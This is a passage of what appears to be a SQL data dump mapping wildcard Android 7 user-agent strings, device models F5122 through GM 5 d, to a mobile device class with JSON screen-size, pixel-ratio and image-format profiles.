Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F5122) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F5321) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F8131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F8132) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F8331) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F8332) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FLOW5PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FLOW_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FLYCAT OPTIMUM 5003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FP2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-L14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FRD-L19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FREEDOM C100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS457) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS459) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS518) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS522) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS528) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS529) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS554) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS8009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS8010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":777,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS8014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FS8028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FTJ162E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FTJ17A00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FUN 4 2018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FUN_18x9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FUN_S20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Fest) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Fest-Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FestXL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; FestXL-Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Fire 4 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Fire 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Flare S6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Fly4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Force F500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Friendly_TH101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Fun5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G2299) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G25524K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3112) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3116) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3212) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3221) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3223) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3226) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3311) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3313) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3412) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3416) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3421) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3423) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G3426) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G8141) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G8142) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; G8231) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GEOTEL G1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GET ONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GIONEE A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GIONEE S10 lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GIONEE X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GL255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GLAM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GM 5 Plus d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GM 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; GM 5 d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 